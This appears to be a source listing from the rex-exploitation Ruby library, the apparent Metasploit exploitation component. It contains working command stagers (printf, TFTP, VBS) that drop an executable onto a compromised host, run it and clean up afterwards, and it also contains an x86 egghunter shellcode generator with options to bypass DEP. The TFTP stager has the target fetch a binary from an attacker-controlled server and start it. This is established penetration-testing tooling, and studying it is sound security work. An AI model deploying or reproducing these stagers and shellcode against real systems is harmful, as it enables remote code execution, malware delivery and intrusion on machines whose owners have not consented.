rex-exploitation 0.1.0

data/lib/rex/exploitation/cmdstager/printf.rb

@@ -0,0 +1,121 @@
+# -*- coding: binary -*-
+
+require 'rex/text'
+require 'rex/arch'
+require 'shellwords'
+
+module Rex
+module Exploitation
+
+class CmdStagerPrintf < CmdStagerBase
+
+  def initialize(exe)
+    super
+
+    @var_elf = Rex::Text.rand_text_alpha(5)
+  end
+
+  #
+  # Override to ensure opts[:temp] is a correct *nix path
+  #
+  def generate(opts = {})
+    opts[:temp] = opts[:temp] || '/tmp/'
+    opts[:temp].gsub!(/\\/, '/')
+    opts[:temp] = opts[:temp].shellescape
+    opts[:temp] << '/' if opts[:temp][-1,1] != '/'
+    super
+  end
+
+  #
+  # Override to set the extra byte count
+  #
+  def generate_cmds(opts)
+    if opts[:noquotes]
+      @cmd_start    = "printf "
+      @cmd_end      = ">>#{@tempdir}#{@var_elf}"
+      @prefix       = '\\\\'
+      min_part_size = 5
+    else
+      @cmd_start    = "printf '"
+      @cmd_end      = "'>>#{@tempdir}#{@var_elf}"
+      @prefix       = '\\'
+      min_part_size = 4
+    end
+    xtra_len = @cmd_start.length + @cmd_end.length
+    opts.merge!({ :extra => xtra_len })
+
+    if (opts[:linemax] - opts[:extra]) < min_part_size
+      raise RuntimeError, "Not enough space for command - #{opts[:extra] + min_part_size} byte required, #{opts[:linemax]} byte available"
+    end
+
+    super
+  end
+
+  #
+  # Encode into a "\12\345" octal format that printf understands
+  #
+  def encode_payload(opts)
+    return Rex::Text.to_octal(@exe, @prefix)
+  end
+
+  #
+  # Override it to ensure that the octal representation of a byte isn't cut
+  #
+  def slice_up_payload(encoded, opts)
+    encoded_dup = encoded.dup
+
+    parts = []
+    xtra_len = opts[:extra]
+    xtra_len ||= 0
+    while (encoded_dup.length > 0)
+      temp = encoded_dup.slice(0, (opts[:linemax] - xtra_len))
+
+      # remove the last octal escape if it is imcomplete
+      if encoded_dup.length > temp.length and encoded_dup[temp.length, @prefix.length] != @prefix
+        pos = temp.rindex('\\')
+        pos -= 1 if temp[pos-1] == '\\'
+        temp.slice!(pos..temp.length-1)
+      end
+
+      parts << temp
+      encoded_dup.slice!(0, temp.length)
+    end
+
+    parts
+  end
+
+  #
+  # Combine the parts of the encoded file with the stuff that goes
+  # before and after it.
+  #
+  def parts_to_commands(parts, opts)
+    parts.map do |p|
+      @cmd_start + p + @cmd_end
+    end
+  end
+
+  #
+  # Since the binary has been already dropped to disk, just execute and
+  # delete it
+  #
+  def generate_cmds_decoder(opts)
+    cmds = []
+    # Make it all happen
+    cmds << "chmod +x #{@tempdir}#{@var_elf}"
+    cmds << "#{@tempdir}#{@var_elf}"
+
+    # Clean up after unless requested not to..
+    unless opts[:nodelete]
+      cmds << "rm -f #{@tempdir}#{@var_elf}"
+    end
+
+    return cmds
+  end
+
+  def cmd_concat_operator
+    " ; "
+  end
+
+end
+end
+end

data/lib/rex/exploitation/cmdstager/tftp.rb

@@ -0,0 +1,70 @@
+# -*- coding: binary -*-
+
+require 'rex/text'
+require 'rex/arch'
+
+module Rex
+module Exploitation
+
+###
+#
+# This class provides the ability to create a sequence of commands from an executable.
+# When this sequence is ran via command injection or a shell, the resulting exe will
+# be written to disk and executed.
+#
+# This particular version uses tftp.exe to download a binary from the specified
+# server.  The original file is preserve, not encoded at all, and so this version
+# is significantly simpler than other methods.
+#
+# Requires: tftp.exe, outbound udp connectivity to a tftp server
+#
+# Written by Joshua J. Drake
+#
+###
+
+class CmdStagerTFTP < CmdStagerBase
+
+  def initialize(exe)
+    super
+    @payload_exe = Rex::Text.rand_text_alpha(8) + ".exe"
+  end
+
+  def setup(mod)
+    self.tftp = Rex::Proto::TFTP::Server.new
+    self.tftp.register_file(Rex::Text.rand_text_alphanumeric(8), exe)
+    self.tftp.start
+    mod.add_socket(self.tftp) # Hating myself for doing it... but it's just a first demo
+  end
+
+  def teardown(mod = nil)
+    self.tftp.stop
+  end
+
+  #
+  # We override compress commands just to stick in a few extra commands
+  # last second..
+  #
+  def compress_commands(cmds, opts)
+    # Initiate the download
+    cmds << "tftp -i #{opts[:tftphost]} GET #{opts[:transid]} #{@tempdir + @payload_exe}"
+
+    # Make it all happen
+    cmds << "start #{@tempdir + @payload_exe}"
+
+    # Clean up after unless requested not to..
+    if (not opts[:nodelete])
+      # XXX: We won't be able to delete the payload while it is running..
+    end
+
+    super
+  end
+
+  # NOTE: We don't use a concatenation operator here since we only have a couple commands.
+  # There really isn't any need to combine them. Also, the ms01_026 exploit depends on
+  # the start command being issued separately so that it can ignore it :)
+  attr_reader :exe
+  attr_reader :payload_exe
+  attr_accessor :tftp
+end
+end
+end

data/lib/rex/exploitation/cmdstager/vbs.rb

@@ -0,0 +1,125 @@
+# -*- coding: binary -*-
+
+require 'rex/text'
+require 'rex/arch'
+
+module Rex
+module Exploitation
+
+###
+#
+# This class provides the ability to create a sequence of commands from an executable.
+# When this sequence is ran via command injection or a shell, the resulting exe will
+# be written to disk and executed.
+#
+# This particular version uses Windows Scripting (VBS) to base64 decode a file,
+# created via echo >>, and decode it to the final binary.
+#
+# Requires: Windows Scripting
+# Known Issue: errors with non-ascii-native systems
+#
+# Written by bannedit
+#
+###
+
+class CmdStagerVBS < CmdStagerBase
+
+  def initialize(exe)
+    super
+
+    @var_decoder = Rex::Text.rand_text_alpha(5)
+    @var_encoded = Rex::Text.rand_text_alpha(5)
+    @var_decoded = Rex::Text.rand_text_alpha(5)
+    @decoder     = nil # filled in later
+  end
+
+
+  #
+  # Override just to set the extra byte count
+  #
+  def generate_cmds(opts)
+    # Set the start/end of the commands here (vs initialize) so we have @tempdir
+    @cmd_start = "echo "
+    @cmd_end   = ">>#{@tempdir}#{@var_encoded}.b64"
+    xtra_len = @cmd_start.length + @cmd_end.length + 1
+    opts.merge!({ :extra => xtra_len })
+    super
+  end
+
+
+  #
+  # Simple base64...
+  #
+  def encode_payload(opts)
+    Rex::Text.encode_base64(@exe)
+  end
+
+
+  #
+  # Combine the parts of the encoded file with the stuff that goes
+  # before / after it.
+  #
+  def parts_to_commands(parts, opts)
+
+    cmds = []
+    parts.each do |p|
+      cmd = ''
+      cmd << @cmd_start
+      cmd << p
+      cmd << @cmd_end
+      cmds << cmd
+    end
+
+    cmds
+  end
+
+
+  #
+  # Generate the commands that will decode the file we just created
+  #
+  def generate_cmds_decoder(opts)
+
+    # Allow decoder stub override (needs to input base64 and output bin)
+    @decoder = opts[:decoder] if (opts[:decoder])
+
+    # Read the decoder data file
+    f = File.new(@decoder, "rb")
+    decoder = f.read(f.stat.size)
+    f.close
+
+    # Replace variables
+    decoder.gsub!(/decode_stub/, "#{@tempdir}#{@var_decoder}.vbs")
+    decoder.gsub!(/ENCODED/, "#{@tempdir}#{@var_encoded}.b64")
+    decoder.gsub!(/DECODED/, "#{@tempdir}#{@var_decoded}.exe")
+
+    # Split it apart by the lines
+    decoder.split("\n")
+  end
+
+
+  #
+  # We override compress commands just to stick in a few extra commands
+  # last second..
+  #
+  def compress_commands(cmds, opts)
+    # Make it all happen
+    cmds << "cscript //nologo #{@tempdir}#{@var_decoder}.vbs"
+
+    # Clean up after unless requested not to..
+    if (not opts[:nodelete])
+      cmds << "del #{@tempdir}#{@var_decoder}.vbs"
+      cmds << "del #{@tempdir}#{@var_encoded}.b64"
+      # NOTE: We won't be able to delete the exe while it's in use.
+    end
+
+    super
+  end
+
+  # Windows uses & to concat strings
+  def cmd_concat_operator
+    " & "
+  end
+
+end
+end
+end

data/lib/rex/exploitation/egghunter.rb

@@ -0,0 +1,423 @@
+# -*- coding: binary -*-
+require 'rex/text'
+require 'rex/arch'
+require 'metasm'
+
+module Rex
+module Exploitation
+
+###
+#
+# This class provides an interface to generating egghunters.  Egghunters are
+# used to search process address space for a known byte sequence.  This is
+# useful in situations where there is limited room for a payload when an
+# overflow occurs, but it's possible to stick a larger payload somewhere else
+# in memory that may not be directly predictable.
+#
+# Original implementation by skape
+# (See http://www.hick.org/code/skape/papers/egghunt-shellcode.pdf)
+#
+# Checksum checking implemented by dijital1/corelanc0d3r
+# Checksum code merged to Egghunter by jduck
+# Conversion to use Metasm by jduck
+# Startreg code added by corelanc0d3r
+# Added routine to disable DEP for discovered egg (for win, added by corelanc0d3r)
+# Added support for searchforward option (true or false)
+#
+###
+class Egghunter
+
+  ###
+  #
+  # Windows-based egghunters
+  #
+  ###
+  module Windows
+    Alias = "win"
+
+    module X86
+      Alias = ARCH_X86
+
+      #
+      # The egg hunter stub for win/x86.
+      #
+      def hunter_stub(payload, badchars = '', opts = {})
+
+        startreg      = opts[:startreg]
+        searchforward = opts[:searchforward]
+
+        raise RuntimeError, "Invalid egg string! Need 4 bytes." if opts[:eggtag].length != 4
+        marker = "0x%x" % opts[:eggtag].unpack('V').first
+
+        checksum = checksum_stub(payload, badchars, opts)
+
+        startstub = ''
+        if startreg
+          if startreg.downcase != 'edx'
+            startstub = "\n\tmov edx,#{startreg}\n\tjmp next_addr"
+          else
+            startstub = "\n\tjmp next_addr"
+          end
+        end
+        startstub << "\n\t" if startstub.length > 0
+
+        # search forward or backward ?
+        flippage = "\n\tor dx,0xfff"
+        edxdirection = "\n\tinc edx"
+
+        if searchforward.to_s.downcase == 'false'
+          # go backwards
+          flippage = "\n\txor dl,dl"
+          edxdirection = "\n\tdec edx"
+        end
+
+        # other vars
+        getpointer   = ''
+        getsize      = ''
+        getalloctype = ''
+        getpc        = ''
+        jmppayload   = "jmp edi"
+
+        apireg = opts[:depreg] || 'esi'
+        apidest = opts[:depdest]
+        depsize = opts[:depsize]
+
+        freeregs = [ "esi", "ebp", "ecx", "ebx" ]
+
+        reginfo = {
+          "ebx"=>["bx","bl","bh"],
+          "ecx"=>["cx","cl","ch"]
+        }
+
+        if opts[:depmethod]
+
+          if freeregs.index(apireg) == nil
+            getpointer << "mov #{freeregs[0]},#{apireg}\n\t"
+            apireg = freeregs[0]
+          end
+          freeregs.delete(apireg)
+
+          if opts[:depmethod].downcase == "virtualalloc"
+            depsize = 0xfff
+          end
+
+          if opts[:depmethod].downcase == "copy" || opts[:depmethod].downcase == "copy_size"
+            if apidest
+              if freeregs.index(apidest) == nil
+                getpointer << "mov #{freeregs[0]},#{apidest}\n\t"
+                apidest = freeregs[0]
+              end
+            else
+              getpc = "fldpi\n\tfstenv [esp-0xc]\n\tpop #{freeregs[0]}\n\t"
+              apidest = freeregs[0]
+            end
+            freeregs.delete(apidest)
+          end
+
+
+          sizereg = freeregs[0]
+
+          if not depsize
+            depsize = payload.length * 2
+            if opts[:depmethod]
+              if opts[:depmethod].downcase == "copy_size"
+                depsize = payload.length
+              end
+            end
+          end
+
+          if depsize <= 127
+            getsize << "push 0x%02x\n\t" % depsize
+          else
+            sizebytes = "%04x" % depsize
+            low = sizebytes[2,4]
+            high = sizebytes[0,2]
+            if sizereg == "ecx" || sizereg == "ebx"
+              regvars = reginfo[sizereg]
+              getsize << "xor #{sizereg},#{sizereg}\n\t"
+              if low != "00" and high != "00"
+                getsize << "mov #{regvars[0]},0x%s\n\t" % sizebytes
+              elsif low != "00"
+                getsize << "mov #{regvars[1]},0x%s\n\t" % low
+              elsif high != "00"
+                getsize << "mov #{regvars[2]},0x%s\n\t" % high
+              end
+            end
+            if sizereg == "ebp"
+              if low != "00" and high != "00"
+                getsize << "xor #{sizereg},#{sizereg}\n\t"
+                getsize << "mov bp,0x%s\n\t" % sizebytes
+              end
+            end
+            # last resort
+            if getsize == ''
+              blockcnt = 0
+              vpsize = 0
+              blocksize = depsize
+              while blocksize > 127
+                blocksize = blocksize / 2
+                blockcnt += 1
+              end
+              getsize << "xor #{sizereg},#{sizereg}\n\tadd #{sizereg},0x%02x\n\t" % blocksize
+              vpsize = blocksize
+              depblockcnt = 0
+              while depblockcnt < blockcnt
+                getsize << "add #{sizereg},#{sizereg}\n\t"
+                vpsize += vpsize
+                depblockcnt += 1
+              end
+              delta = depsize - vpsize
+              if delta > 0
+                getsize << "add #{sizereg},0x%02x\n\t" % delta
+              end
+            end
+            if opts[:depmethod].downcase == "virtualalloc"
+              getsize << "inc #{sizereg}\n\t"
+            end
+
+            getsize << "push #{sizereg}\n\t"
+
+          end
+
+          getalloctype = getsize
+
+          case opts[:depmethod].downcase
+            when "virtualprotect"
+              jmppayload = "push esp\n\tpush 0x40\n\t"
+              jmppayload << getsize
+              jmppayload << "push edi\n\tpush edi\n\tpush #{apireg}\n\tret"
+            when "virtualalloc"
+              jmppayload = "push 0x40\n\t"
+              jmppayload << getalloctype
+              jmppayload << "push 0x01\n\t"
+              jmppayload << "push edi\n\tpush edi\n\tpush #{apireg}\n\tret"
+            when "copy"
+              jmppayload = getpc
+              jmppayload << "push edi\n\tpush #{apidest}\n\tpush #{apidest}\n\tpush #{apireg}\n\tmov edi,#{apidest}\n\tret"
+            when "copy_size"
+              jmppayload = getpc
+              jmppayload << getsize
+              jmppayload << "push edi\n\tpush #{apidest}\n\tpush #{apidest}\n\tpush #{apireg}\n\tmov edi,#{apidest}\n\tret"
+          end
+        end
+
+        jmppayload << "\n" if jmppayload.length > 0
+
+        assembly = <<EOS
+#{getpointer}
+#{startstub}
+check_readable:
+  #{flippage}
+next_addr:
+  #{edxdirection}
+  push edx
+  push 0x02   ; use NtAccessCheckAndAuditAlarm syscall
+  pop eax
+  int 0x2e
+  cmp al,5
+  pop edx
+  je check_readable
+check_for_tag:
+  ; check that the tag matches once
+  mov eax,#{marker}
+  mov edi,edx
+  scasd
+  jne next_addr
+  ; it must match a second time too
+  scasd
+  jne next_addr
+  ; check the checksum if the feature is enabled
+#{checksum}
+  ; jump to the payload
+  #{jmppayload}
+EOS
+
+        assembled_code = Metasm::Shellcode.assemble(Metasm::Ia32.new, assembly).encode_string
+
+        # return the stub
+        assembled_code
+      end
+
+    end
+  end
+
+  ###
+  #
+  # Linux-based egghunters
+  #
+  ###
+  module Linux
+    Alias = "linux"
+
+    module X86
+      Alias = ARCH_X86
+
+      #
+      # The egg hunter stub for linux/x86.
+      #
+      def hunter_stub(payload, badchars = '', opts = {})
+
+        startreg = opts[:startreg]
+
+        raise RuntimeError, "Invalid egg string! Need #{esize} bytes." if opts[:eggtag].length != 4
+        marker = "0x%x" % opts[:eggtag].unpack('V').first
+
+        checksum = checksum_stub(payload, badchars, opts)
+
+        startstub = ''
+        if startreg
+          if startreg.downcase != 'ecx'
+            startstub = "\n\tmov ecx,#{startreg}\n\tjmp next_addr"
+          else
+            startstub = "\n\tjmp next_addr"
+          end
+        end
+        startstub << "\n\t" if startstub.length > 0
+
+        assembly = <<EOS
+  cld
+#{startstub}
+check_readable:
+  or cx,0xfff
+next_addr:
+  inc ecx
+  push 0x43   ; use 'sigaction' syscall
+  pop eax
+  int 0x80
+  cmp al,0xf2
+  je check_readable
+
+check_for_tag:
+  ; check that the tag matches once
+  mov eax,#{marker}
+  mov edi,ecx
+  scasd
+  jne next_addr
+  ; it must match a second time too
+  scasd
+  jne next_addr
+
+  ; check the checksum if the feature is enabled
+#{checksum}
+
+  ; jump to the payload
+  jmp edi
+EOS
+
+        assembled_code = Metasm::Shellcode.assemble(Metasm::Ia32.new, assembly).encode_string
+
+        # return the stub
+        assembled_code
+      end
+
+    end
+  end
+
+  ###
+  #
+  # Generic interface
+  #
+  ###
+
+  #
+  # Creates a new egghunter instance and acquires the sub-class that should
+  # be used for generating the stub based on the supplied platform and
+  # architecture.
+  #
+  def initialize(platform, arch = nil)
+    Egghunter.constants.each { |c|
+      mod = self.class.const_get(c)
+
+      next if ((!mod.kind_of?(::Module)) or
+               (!mod.const_defined?('Alias')))
+
+      if (platform =~ /#{mod.const_get('Alias')}/i)
+        self.extend(mod)
+
+        if (arch and mod)
+          mod.constants.each { |a|
+            amod = mod.const_get(a)
+
+            next if ((!amod.kind_of?(::Module)) or
+                     (!amod.const_defined?('Alias')))
+
+            if (arch =~ /#{mod.const_get(a).const_get('Alias')}/i)
+              amod = mod.const_get(a)
+
+              self.extend(amod)
+            end
+          }
+        end
+      end
+    }
+  end
+
+  #
+  # This method generates an egghunter using the derived hunter stub.
+  #
+  def generate(payload, badchars = '', opts = {})
+    # set defaults if options are missing
+
+    # NOTE: there is no guarantee this won't exist in memory, even when doubled.
+    # To address this, use the checksum feature :)
+    opts[:eggtag] ||= Rex::Text.rand_text(4, badchars)
+
+    # Generate the hunter_stub portion
+    return nil if ((hunter = hunter_stub(payload, badchars, opts)) == nil)
+
+    # Generate the marker bits to be prefixed to the real payload
+    egg = ''
+    egg << opts[:eggtag] * 2
+    egg << payload
+    if opts[:checksum]
+      cksum = 0
+      payload.each_byte { |b|
+        cksum += b
+      }
+      egg << [cksum & 0xff].pack('C')
+    end
+
+    return [ hunter, egg ]
+  end
+
+protected
+
+  #
+  # Stub method that is meant to be overridden.  It returns the raw stub that
+  # should be used as the egghunter.
+  #
+  def hunter_stub(payload, badchars = '', opts = {})
+  end
+
+  def checksum_stub(payload, badchars = '', opts = {})
+    return '' if not opts[:checksum]
+
+    if payload.length < 0x100
+      cmp_reg = "cl"
+    elsif payload.length < 0x10000
+      cmp_reg = "cx"
+    else
+      raise RuntimeError, "Payload too big!"
+    end
+    egg_size = "0x%x" % payload.length
+
+    checksum = <<EOS
+  push ecx
+  xor ecx,ecx
+  xor eax,eax
+calc_chksum_loop:
+  add al,byte [edi+ecx]
+  inc ecx
+  cmp #{cmp_reg},#{egg_size}
+  jnz calc_chksum_loop
+test_chksum:
+  cmp al,byte [edi+ecx]
+  pop ecx
+  jnz next_addr
+EOS
+  end
+
+end
+
+end
+end